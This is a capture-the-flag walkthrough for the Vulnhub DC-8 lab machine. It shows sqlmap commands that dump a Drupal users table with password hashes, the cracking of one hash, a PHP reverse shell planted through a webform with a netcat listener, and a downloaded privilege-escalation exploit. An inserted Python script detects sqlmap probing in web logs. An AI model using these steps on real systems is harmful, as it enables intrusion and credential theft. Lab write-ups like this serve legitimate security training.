Vulnhub DC-8 Walkthrough

We start by scanning the host with nmap -A -T4 -p- 192.168.1.5 -vv

Scanning directories with dirb came up with:

OK, the robots.txt file came with a lot to know:

We can see from the robots.txt file that there are some SQL databases on the site. We need to find one to exploit with sqlmap, so let’s visit the links on the site:

sqlmap -u "192.168.1.5/?nid=1" --dbs --batch --risk 3 --level 5

sqlmap -u "192.168.1.5/?nid=1" -D d7db --tables --batch --risk 3 --level 5

sqlmap -u "192.168.1.5/?nid=1" -D d7db -T users --columns --dump
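From the defender's side, the sqlmap runs above leave clear traces in the web server's access log: sqlmap announces itself in the User-Agent header by default, and nid, which should only ever be a numeric node id, arrives carrying SQL syntax. The following is an added example, not part of the original walkthrough; it assumes the Apache/nginx "combined" log format, and the log lines and the function name suspicious_requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in "combined" log format (not taken from the original page).
SAMPLE_LOG = """\
192.168.1.20 - - [10/Oct/2019:13:55:36 +0000] "GET /?nid=1 HTTP/1.1" 200 7512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.9 - - [10/Oct/2019:13:56:01 +0000] "GET /?nid=1%27%20AND%204242%3D4242--%20- HTTP/1.1" 200 7512 "-" "sqlmap/1.3#stable (http://sqlmap.org)"
192.168.1.9 - - [10/Oct/2019:13:56:02 +0000] "GET /?nid=1%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 7490 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.20 - - [10/Oct/2019:13:57:10 +0000] "GET /node/3 HTTP/1.1" 200 9120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def suspicious_requests(log_text):
    """Return (client_ip, reasons) for requests that look like SQLi probing of nid."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        reasons = []
        if "sqlmap" in m["ua"].lower():
            reasons.append("sqlmap user-agent")
        # parse_qsl percent-decodes the value; a node id must be ASCII digits only.
        query = urlsplit(m["target"]).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key == "nid" and not re.fullmatch(r"[0-9]+", value):
                reasons.append("non-numeric nid")
        if reasons:
            findings.append((m["ip"], reasons))
    return findings


if __name__ == "__main__":
    for ip, reasons in suspicious_requests(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```

The same digits-only rule, enforced in the application before nid reaches a query, closes the injection point itself; the User-Agent match alone is easy to evade, so the parameter check is the one to rely on.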

Now we have 2 users with hashed passwords:

admin   | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

john    | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

Using John to crack the hashes, john’s hash came back with the password turtle, while the admin hash looks like it is going to take time, as maybe it’s not meant to be cracked, so let’s use john’s password to log in.

We are going to use this link to log in: http://192.168.1.5/user/

Now navigate to this webpage http://192.168.1.5/user#overlay=node/3/webform/configure and change Text Format to PHP

Now let’s upload PHP shell code to this page:

After that we go to the contacts page, fill it in with anything and click submit, while on our end there is an nc on port 444, which I use, ready for the connection to be made.

OK, now I used a tool called linux-exploit-suggester.sh, searched for the exploit on my machine using searchsploit and located it, then compiled it with gcc, then transferred it to the host using wget and SimpleHTTPServer.

locate 45010.c

gcc -o hack2 45010.c

Change directory to /root and cat flag.txt and we are done!!!
